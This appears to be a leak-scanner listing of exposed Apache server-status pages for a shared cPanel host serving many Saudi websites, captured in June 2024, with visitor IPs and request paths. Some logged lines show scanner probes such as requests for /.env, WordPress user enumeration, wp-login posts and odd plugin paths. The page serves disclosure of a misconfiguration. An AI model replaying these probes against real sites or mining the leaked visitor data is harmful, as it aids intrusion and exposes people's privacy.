      0-1077620/25/12692_
      3.4731918680752390.01.151861.23
      162.158.129.115http/1.1qr.brunch.ws:443GET /dar-zed HTTP/1.1
      
      0-1077620/34/12214_
      3.5220734129482910.01.011334.13
      95.185.75.45http/1.1albayan.edu.sa:443GET /web/425.html2 HTTP/1.1
      
      0-1077620/26/12811_
      3.53188053474570.01.011501.58
      52.167.144.212http/1.1albayan.edu.sa:80GET /albayan_library/Categorys2.php?sec=2 HTTP/1.1
      
      0-1077620/36/12670_
      3.4438240339456470.06.141808.12
      172.69.225.253http/1.1qr.brunch.ws:443GET /login HTTP/1.1
      
      0-1077620/12/12958_
      3.4142229119957010.00.812042.49
      192.46.211.230http/1.1garndhabi.org:80GET /config.json HTTP/1.1
      
      0-1077620/18/12705_
      3.5682271477940.00.581764.18
      151.255.247.147http/1.1albayan.edu.sa:443GET /e_sch/js/jquery.corner.js HTTP/1.1
      
      0-1077620/19/13438_
      3.5316829393139490.00.991666.51
      95.185.75.45http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A7%D9%84%D8%B9%D8%B4%D8%B1%20%D8%A7%D9%84%
      
      0-1077620/16/12321_
      3.424072232223060.00.221698.72
      95.187.83.8http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-1077620/17/12998_
      3.551422984342000.00.721592.77
      164.92.137.129http/1.13dvi.com:443GET / HTTP/1.0
      
      0-1077620/72/12499_
      3.512145374176710.00.581756.46
      172.69.225.253http/1.1qr.brunch.ws:443POST /foods/172 HTTP/1.1
      
      0-1077620/18/12647_
      3.4824038201486580.02.432111.08
      157.230.115.227http/1.13dvi.com:443GET /odinhttpcall1718030504 HTTP/1.1
      
      0-1077620/21/13050_
      3.31207491546260.04.261967.02
      102.159.115.126http/1.1
      
      1-1082380/20/12273_
      3.1060117417900.01.762015.13
      178.86.4.100http/1.1albayan.edu.sa:80GET / HTTP/1.1
      
      1-1082380/26/12672_
      3.0714461096022790.01.241988.35
      164.92.118.22http/1.1zed.sa:443GET /wp-login.php HTTP/1.1
      
      1-1082380/19/13057_
      2.972766391432450.00.241848.28
      95.185.75.45http/1.1albayan.edu.sa:443GET /web/424.html2 HTTP/1.1
      
      1-1082380/20/12494_
      2.95326159129361150.00.771431.21
      66.249.70.128http/1.1daris.live:80GET /login HTTP/1.1
      
      1-1082380/13/12020_
      3.0714675385793430.02.261632.61
      95.185.75.45http/1.1albayan.edu.sa:443GET /imgweb/1445/t6.pdf HTTP/1.1
      
      1-1082380/19/12846_
      2.79247281112740.01.121617.57
      157.230.115.227http/1.1
      
      1-1082380/29/11983_
      2.832386108076850.02.761782.50
      165.22.66.194http/1.1
      
      1-1082380/26/12648_
      3.06193380756070.00.971440.03
      142.154.48.234http/1.1albayan.edu.sa:443GET /e_sch/font/css/bootstrap.min.css HTTP/1.1
      
      1-1082380/17/11797_
      2.822385212441530.00.201653.56
      165.22.66.194http/1.1
      Found on 2024-06-10 14:45
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7226aa97a

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 08-Jun-2024 15:46:38 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  16 days 11 hours 41 minutes 49 seconds
      Server load: 0.44 0.45 0.46
      Total accesses: 2222151 - Total Traffic: 348.0 GB - Total Duration: 2796811721
      CPU Usage: u1065.64 s120.59 cu9377.81 cs2121.17 - .89% CPU load
      1.56 requests/sec - 256.2 kB/second - 164.2 kB/request - 1258.61 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 242 idle workers
      __________K_____________________________________________________
      ___K_____________________K_____________________________R_____WWW
      WWWWWWWWWWWWWWWWWWWWWWK_______________________________K_________
      _____________________K___________.........................______
      __________________W_________________________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9232050/335/10403_
      49.43299252107464230.0113.301564.38
      5.110.154.8http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      0-9232050/372/9133_
      49.3936913269757130.072.931636.09
      5.110.154.8http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff2?v=4
      
      0-9232050/420/9502_
      49.5654259622470.0158.121480.03
      31.167.222.200http/1.1albayan.edu.sa:443GET /e_sch/images/complaints_and_suggestions.png HTTP/1.1
      
      0-9232050/317/9517_
      49.521803393834380.098.311509.40
      176.224.39.86http/1.1albayan.edu.sa:443GET /imgweb/1445/book-03.jpg HTTP/1.1
      
      0-9232050/394/9933_
      49.46272382168710.063.201531.38
      66.249.64.110http/1.1hawsab.me:443GET /?tff14168wsabr580.html HTTP/1.1
      
      0-9232050/364/9192_
      49.55904161264460.024.091748.08
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=1193 HTTP/1.1
      
      0-9232050/468/9639_
      49.551331121841010.0113.371663.71
      31.167.222.200http/1.1albayan.edu.sa:443GET /registration/asset/logo.png HTTP/1.1
      
      0-9232050/407/9420_
      49.55990223562140.063.701708.55
      66.249.64.9http/1.1albayan.edu.sa:80GET / HTTP/1.1
      
      0-9232050/325/10208_
      49.4231026379203240.058.491715.46
      5.110.154.8http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.ttf?v=4.7
      
      0-9232050/529/9945_
      49.51217275801910.088.631559.78
      188.53.54.231http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-9232051/282/9389K
      49.5801289397750.812.511239.45
      172.69.130.87http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      0-9232050/375/10102_
      49.41322364630050.027.541249.82
      5.110.154.8http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/bVwCyDAWKGsY8EwR10moMu
      
      0-9232050/334/9616_
      49.54153283741480.065.881787.14
      31.167.222.200http/1.1albayan.edu.sa:443GET /web/images/logo_school.png HTTP/1.1
      
      0-9232050/279/9416_
      49.5738272934810.036.941646.49
      141.164.141.90http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-9232050/277/9274_
      49.171924123663880.017.361210.27
      5.110.154.8http/1.1
      
      0-9232050/327/9482_
      49.363711549966470.086.761362.82
      5.110.154.8http/1.1jawad.com.sa:443POST /api/v.1/front/category/list HTTP/1.1
      
      0-9232050/314/9645_
      49.49247165335161420.012.721593.14
      50.60.169.190http/1.1united.thenewjeddah.com:443GET /js/barcode.js HTTP/1.1
      
      0-9232050/243/9846_
      49.423092105864500.023.271778.72
      66.249.64.12http/1.1albayan.edu.sa:443GET /imgweb/1445/%D8%A8%D9%86%D9%83%20%D9%85%D9%87%D8%A7%D8%B1%
      
      0-9232050/359/9682_
      49.36385365704370.0104.601625.81
      5.110.154.8http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/164iTLCCI77zVQIydjljT9
      
      0-9232050/377/10034_
      49.45277272377270.035.321405.54
      51.39.229.240http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font1/DroidKufi-Bold.woff HTTP/1.1
      
      0-9232050/300/9338_
      49.48259266223235280.0127.701413.29
      35.95.124.220http/1.1sulaimaniya.edu.sa:443GET /%D8%A7%D9%84%D8%AA%D8%B9%D9%84%D9%85-%D8%A7%D9%84%D8%A7%D9
      
      0-9232050/327/9708_
      49.5729376087630.026.191398.75
      66.249.64.7http/1.1hawsab.me:80GET /?dnp8293vwzhifzj536.html HTTP/1.1
      
      0-9232050/380/9532_
      49.38370370097940.083.341559.72
      5.110.154.8http/1.1jawad.com.sa:443GET /storage/app/public/uploads/products/6WaLV9c1KzM2wYug3TgYb3
      
      0-9232050/365/9738_
      49.3933312195762410.0167.041680.90
      5.110.154.8http/1.1jawad.com.sa:443GET /favicon.ico HTTP/1.1
      
      0-9232050/373/9811_
      49.48263383965550.0101.141756.39
      5.109.166.62http/1.1albayan.edu.sa:443GET / HTTP/1.1
      
      1-9232340/388/8988_
      49.7294295427050.070.161785.44
      66.249.64.13http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      1-9232340/397/9624_
      49.4136825284984140.0101.251672.76
      5.110.154.8http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      1-9232340/379/9811_
      49.541952978447950.026.681652.24
      66.249.70.6http/1.1jawad.com.sa:443POST /api/v.1/front/visitor/count HTTP/1.1
      
      1-9232340/381/9579_
      49.48275240123467070.060.961214.86
      5.110.154.8http/1.1jawad.com.sa:443GET /public/front_resources/fonts/fontawesome-webfont.woff?v=4.
      
      1-9232340/383/9247_
      49.743129578795500.075.731494.94
      156.200.252.47http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/________%20________%20_______
      
      1-9232340/397/9760_
      49.701362072819130.086.031346.63
      66.249.70.164http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=185 HTTP/1.1
      
      1-9232340/348/9346_
      49.711332103869090.083.361596.92
      
      Found on 2024-06-08 12:46
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df782bde09e

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Saturday, 08-Jun-2024 14:57:56 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  16 days 10 hours 53 minutes 6 seconds
      Server load: 0.46 0.38 0.36
      Total accesses: 2218686 - Total Traffic: 346.6 GB - Total Duration: 2793552883
      CPU Usage: u1046.52 s115.17 cu9377.81 cs2121.17 - .891% CPU load
      1.56 requests/sec - 255.7 kB/second - 163.8 kB/request - 1259.1 ms/request
      8 requests currently being processed, 0 workers gracefully restarting, 242 idle workers
      ____________K______________K______________________W_____________
      ____________________K________________________K_______________WWW
      WWWWWWWWWWWWWWWWWWWWWW__________K_______________________________
      _________________________________........................._K____
      _________________________________K__________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9232050/324/10392_
      47.603870107453910.0112.771563.85
      66.249.64.8http/1.1albayan.edu.sa:80GET /e_sch/news_replies.php?user=web&i_f=1501&l_n=1&page=1 HTTP
      
      0-9232050/359/9120_
      47.6228634969741290.071.991635.15
      2.90.244.236http/1.1albayan.edu.sa:443GET /imgweb/files40/tawheed3-2nd.pdf HTTP/1.1
      
      0-9232050/407/9489_
      47.6324413559596070.0157.231479.15
      51.252.205.251http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-9232050/302/9502_
      47.6713037393827030.097.841508.93
      66.249.70.131http/1.1akg.sa:443GET /robots.txt HTTP/1.1
      
      0-9232050/381/9920_
      47.64207282137050.061.911530.10
      46.52.19.2http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      0-9232050/294/9122_
      47.5560720161204850.021.581745.57
      66.249.64.12http/1.1albayan.edu.sa:443GET /albayan_library/Books.php?sec=733 HTTP/1.1
      
      0-9232050/444/9615_
      47.6858104121818710.0111.681662.01
      66.249.64.227http/1.1trynidaa.com:443GET /wp-content/themes/betheme-2/assets/animations/animations.m
      
      0-9232050/391/9404_
      47.54654314223560180.063.521708.38
      e9b8e372f1.scan.leakix.orghttp/1.1nidaa.daaris.com:80GET /server-status HTTP/1.1
      
      0-9232050/320/10203_
      47.26296079196540.058.291715.25
      185.180.143.146http/1.1
      
      0-9232050/517/9933_
      47.55654275741620.085.691556.84
      134.122.28.88http/1.1nidaa.daaris.com:80GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      0-9232050/257/9364_
      47.585121289369530.09.711236.65
      176.47.26.196http/1.1albayan.edu.sa:443GET /e_sch/Fonts/font6/ge-ss-med.woff HTTP/1.1
      
      0-9232050/365/10092_
      47.613396364618160.027.051249.32
      165.232.180.139http/1.1trynidaa.com:443POST /wp-login.php HTTP/1.1
      
      0-9232051/322/9604K
      47.681183704960.865.321786.58
      172.69.214.9http/1.1nidaa.ws:80GET /server HTTP/1.1
      
      0-9232050/269/9406_
      47.59494272897170.036.271645.82
      27.115.124.4http/1.1jawad.com.sa:443GET /public/front_resources/css/style_ar.css HTTP/1.1
      
      0-9232050/271/9268_
      47.651611123641050.016.031208.94
      66.249.64.9http/1.1hawsab.me:80GET /?abl15290hwrpwljg1489.html HTTP/1.1
      
      0-9232050/319/9474_
      47.26299049956830.086.461362.51
      185.180.143.146http/1.1
      
      0-9232050/306/9637_
      47.6044789335159230.012.581593.00
      66.249.64.14http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1606&page=1 HTTP/1.1
      
      0-9232050/235/9838_
      47.565401262105474200.018.631774.08
      114.119.145.78http/1.1albayan.edu.sa:443GET /imgweb/qb40/1/eng11.pdf HTTP/1.1
      
      0-9232050/350/9673_
      47.59487065677240.093.991615.21
      66.249.70.168http/1.1albayan.edu.sa:80GET / HTTP/1.1
      
      0-9232050/355/10012_
      47.26301272369210.034.541404.76
      185.180.143.146http/1.1
      
      0-9232050/291/9329_
      46.932673223210350.0126.541412.13
      216.218.206.67http/1.1
      
      0-9232050/316/9697_
      47.6130813476078170.025.921398.48
      172.70.134.173http/1.1support.daaris.com:443GET /serverstatus.php?language=danish HTTP/1.1
      
      0-9232050/366/9518_
      47.6792168139470.073.541549.91
      216.218.206.67http/1.13dvi.com:443GET /favicon.ico HTTP/1.1
      
      0-9232050/355/9728_
      47.604241195761200.0166.981680.85
      185.191.126.213http/1.1php.we3dvi.com:80GET / HTTP/1.1
      
      0-9232050/366/9804_
      47.6517472783917490.086.011741.26
      94.156.65.8http/1.1zed.sa:443GET /wp-content/plugins/WordPressCore/include.php HTTP/1.1
      
      1-9232340/380/8980_
      47.31529195424140.070.071785.35
      5.133.192.167http/1.1white-petals.com:443GET /favicon.ico HTTP/1.1
      
      1-9232340/390/9617_
      47.3339814884966620.0100.781672.29
      142.154.10.56http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-9232341/375/9807K
      47.420178431300.818.911644.47
      108.162.241.174http/1.1nidaa.ws:80GET /v2/_catalog HTTP/1.1
      
      1-9232340/371/9569_
      47.113854123421370.033.571187.47
      216.218.206.67http/1.1
      
      1-9232340/368/9232_
      47.17294178774840.074.841494.04
      185.180.143.146http/1.1
      
      1-9232340/383/9746_
      47.27653172814170.085.861346.46
      134.122.28.88http/1.1nidaa.daaris.com:80GET /.env HTTP/1.1
      
      1-9232340/341/9339_
      47.42242103867390.083.281596.84
      2.90.65.52http/1.1albayan.edu.sa:443GET /favicon.ico HTTP/1.1
      
      1-9232340/430/9449_
      47.39123577164100.045.051207.72
      95.108.213.233http/1.1albayan.edu.sa:443GET /albayan_library/BooksVi.php?b=942 HTTP/1.1
      
      1-9232340/311/8759_
      47.37272
      Found on 2024-06-08 11:57
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7e2fa8854

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 06-Jun-2024 11:51:02 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  14 days 7 hours 46 minutes 13 seconds
      Server load: 0.64 0.48 0.44
      Total accesses: 1996420 - Total Traffic: 313.5 GB - Total Duration: 2455006786
      CPU Usage: u1021.84 s120.1 cu8377.5 cs1910.23 - .924% CPU load
      1.61 requests/sec - 265.6 kB/second - 164.7 kB/request - 1229.7 ms/request
      12 requests currently being processed, 0 workers gracefully restarting, 238 idle workers
      _________________CK______________________K________..............
      ..........._____W__________________K________K________________WWW
      WWWWWWWWWWWWWWWWWWWWWW__K__________________________________K____
      _________________K________________K__________________K__________
      ______________________________K_____________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9126910/226/9500_
      28.81131299811080.042.731363.91
      5.108.192.121http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/close_video_bg.png
      
      0-9126910/153/8257_
      28.7714926158382600.043.971477.78
      a36d657dc7.scan.leakix.orghttp/1.1abu-helal.com:443GET /server-status HTTP/1.1
      
      0-9126910/220/8601_
      28.383609354348510.065.451246.17
      176.224.72.49http/1.1
      
      0-9126910/235/8603_
      28.594922060390547330.089.281326.45
      176.224.72.49http/1.1sulaimaniya.edu.sa:443GET /wp-content/uploads/2021/12/IMG_20211121_163513-scaled.jpg 
      
      0-9126910/171/8944_
      28.60480279138280.048.151372.20
      5.41.69.82http/1.1jawad.com.sa:443GET /public/front_resources/images/logo-footer.png HTTP/1.1
      
      0-9126910/192/8256_
      28.461556767223330.042.001636.82
      165.22.34.189http/1.1
      
      0-9126910/252/8559_
      28.771492113292270.039.171483.66
      165.22.34.189http/1.1abu-helal.com:443GET /?rest_route=/wp/v2/users/ HTTP/1.1
      
      0-9126910/186/8451_
      28.70212266989430.043.861564.32
      141.164.228.150http/1.1albayan.edu.sa:443GET /e_sch/js/pe.kenburns/themes/default/img/thumb_bg.png HTTP/
      
      0-9126910/192/9323_
      28.70204273291450.067.021605.48
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717663657.96170210838317871093
      
      0-9126910/182/8800_
      28.64444567541010.019.071405.36
      66.249.72.35http/1.1alezdhar.com:443GET /videos/Zed-1296-1.mp4 HTTP/1.1
      
      0-9126910/229/8644_
      28.831062262803110.050.231191.43
      37.43.6.201http/1.1albayan.edu.sa:443GET /e_sch/source/inettuts.css HTTP/1.1
      
      0-9126910/157/9095_
      28.45197262107370.023.971144.14
      141.164.228.150http/1.1
      
      0-9126910/174/8750_
      28.8491276042520.037.891686.62
      46.230.92.51http/1.1albayan.edu.sa:443GET /js/jquery-1.3.2.js HTTP/1.1
      
      0-9126910/168/8580_
      28.64278167754940.010.891568.60
      5.255.231.48http/1.1alnwisher.com:443GET /robots.txt HTTP/1.1
      
      0-9126910/291/8450_
      28.643563119118680.037.281124.81
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717663506.25685811042785644531
      
      0-9126910/184/8502_
      28.872316746333140.021.241243.24
      18.200.191.122http/1.1sulaimaniya.edu.sa:443GET /download/52/%D9%81%D9%8A%D8%B2%D9%8A%D8%A7%D8%A1/1903/%D8%
      
      0-9126910/245/8829_
      28.5751731055684970.035.341531.14
      66.249.75.34http/1.1akg.sa:443GET /?judication/1394019 HTTP/1.1
      
      0-9126911/272/8890C
      28.8854103058126.1118.651662.86
      195.191.219.133http/1.1albayan.edu.sa:443GET /e_sch/code/forum/db.php?j=5&q=334&t=167.114.116.25&c=5 HTT
      
      0-9126911/211/8755K
      28.880160152050.833.551495.38
      162.158.63.18http/1.1nidaa.ws:80GET /about HTTP/1.1
      
      0-9126910/151/9002_
      28.8754166851020.020.191337.94
      66.249.69.107http/1.1albayan.edu.sa:443GET /imgweb/file42/book/1/c0992e54-GE-ME-K07-SM1-tart.pdf HTTP/
      
      0-9126910/180/8447_
      28.858167221331150.024.561258.04
      37.43.6.201http/1.1albayan.edu.sa:443GET /e_sch/news_replies.php?user=web&i_f=1757&l_n=1&page=1 HTTP
      
      0-9126910/323/8726_
      28.71167872433040.034.251343.30
      45.125.66.42http/1.1randalift.com.sa:80GET /wp-content/plugins/wp-catcher/index.php HTTP/1.1
      
      0-9126910/162/8572_
      28.8667365052670.012.361397.12
      37.43.6.201http/1.1albayan.edu.sa:443GET /e_sch/jwysiwyg/jquery.wysiwyg.css HTTP/1.1
      
      0-9126910/309/8786_
      28.8311534161825910.028.991437.97
      5.108.192.121http/1.1albayan.edu.sa:443GET /imgweb/vat.jpg HTTP/1.1
      
      0-9126910/215/8830_
      28.604754662940690.068.051614.85
      54.36.148.156http/1.1daris.live:443GET /user?redirect=product/60/data-engineering HTTP/1.1
      
      1-9277770/272/7948_
      44.311511591256620.068.411648.71
      66.249.69.105http/1.1albayan.edu.sa:443GET /imgweb/file44/%D8%AC%D8%AF%D9%88%D9%84%20%D8%A7%D9%84%D8%A
      
      1-9277770/351/8574_
      44.09470274836940.080.011539.25
      5.82.102.157http/1.1zed.sa:443GET /menu/wp-content/plugins/jet-menu/assets/public/lib/font-aw
      
      1-9277770/359/8763_
      44.22131375547880.042.241585.83
      5.108.192.121http/1.1albayan.edu.sa:443GET /e_sch/images/footer.jpg HTTP/1.1
      
      1-9277770/301/8646_
      43.754761105704500.013.621114.05
      5.41.69.82http/1.1
      
      1-9277770/376/8299_
      44.15269373041340.036.891326.71
      138.201.201.48http/1.1sulaimaniya.edu.sa:443POST /wp-cron.php?doing_wp_cron=1717663593.43582701683044433593
      
      1-9277770/560/8775_
      44.1044869564475510.062.501234.62
      66.249.69.107http/1.1albayan.edu.sa:443GET /albayan_library/upload/books/________%20________%20____%20
      
      1-9277770/358/8375_
      44.0126394497850.017.041426.26
      66.249.75.166ht
      Found on 2024-06-06 08:51
    • Severity: medium
      Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb3182de3df782de3df7eb45ae15

      Apache Status
      
      Apache Server Status for nidaa.ws (via 138.201.201.48)
      
      Server Version: Apache/2.4.59 (cPanel) OpenSSL/1.1.1w mod_bwlimited/1.4 Phusion_Passenger/6.0.22
      Server MPM: worker
      Server Built: May 22 2024 00:34:08
      
      Current Time: Thursday, 06-Jun-2024 10:40:50 +03
      Restart Time: Thursday, 23-May-2024 04:04:49 +03
      Parent Server Config. Generation: 10
      Parent Server MPM Generation: 9
      Server uptime:  14 days 6 hours 36 minutes
      Server load: 0.37 0.36 0.39
      Total accesses: 1992042 - Total Traffic: 313.1 GB - Total Duration: 2453830429
      CPU Usage: u1002.88 s116.82 cu8377.5 cs1910.23 - .925% CPU load
      1.62 requests/sec - 266.2 kB/second - 164.8 kB/request - 1231.82 ms/request
      7 requests currently being processed, 0 workers gracefully restarting, 243 idle workers
      ________________________________________________K_..............
      ...........__________________K_____________________________K_WWW
      WWWWWWWWWWWWWWWWWWWWWW_K________________________________________
      ____________________________________________________K___________
      _____________K__________W___________________....................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ................................................................
      ........
      Scoreboard Key:
      "_" Waiting for Connection, 
      "S" Starting up, 
      "R" Reading Request,
      "W" Sending Reply, 
      "K" Keepalive (read), 
      "D" DNS Lookup,
      "C" Closing connection, 
      "L" Logging, 
      "G" Gracefully finishing, 
      "I" Idle cleanup of worker, 
      "." Open slot with no current process
      
      
      
      SrvPIDAccMCPU
      SSReqDurConnChildSlotClientProtocolVHostRequest
      
      0-9126910/211/9485_
      26.92436699801190.041.841363.01
      172.70.156.159http/1.1qr.brunch.ws:443GET /storage/food_image/17088535992345_img87d03a054fb04c81a8cc3
      
      0-9126910/130/8234_
      26.93436558371180.042.501476.31
      172.70.156.141http/1.1qr.brunch.ws:443GET /storage/food_image/17096787797999_watermelon.webp HTTP/1.1
      
      0-9126910/205/8586_
      26.83136754339510.065.141245.85
      31.167.72.252http/1.1
      
      0-9126910/217/8585_
      27.064820390503400.088.631325.80
      127.0.0.1http/1.1php.we3dvi.com:80GET /whm-server-status HTTP/1.0
      
      0-9126910/157/8930_
      26.8070079131240.047.771371.82
      5.163.52.26http/1.1
      
      0-9126910/186/8250_
      26.90440167219090.041.871636.69
      172.70.156.150http/1.1qr.brunch.ws:443GET /storage/food_image/17096781872999_petti.webp HTTP/1.1
      
      0-9126910/233/8540_
      26.904402112378900.037.871482.36
      172.70.156.159http/1.1qr.brunch.ws:443GET /storage/food_image/17088540548488_img773eaf041bc94628a6943
      
      0-9126910/154/8419_
      26.993945466943520.041.751562.21
      40.77.167.255http/1.1jawad.com.sa:443GET /en/details/752 HTTP/1.1
      
      0-9126910/187/9318_
      26.924424873277300.066.951605.41
      3.249.62.81http/1.1jawad.com.sa:443GET /ar HTTP/1.1
      
      0-9126910/173/8791_
      26.83484267513140.013.741400.03
      77.83.233.202http/1.1alnwisher.com:80GET / HTTP/1.1
      
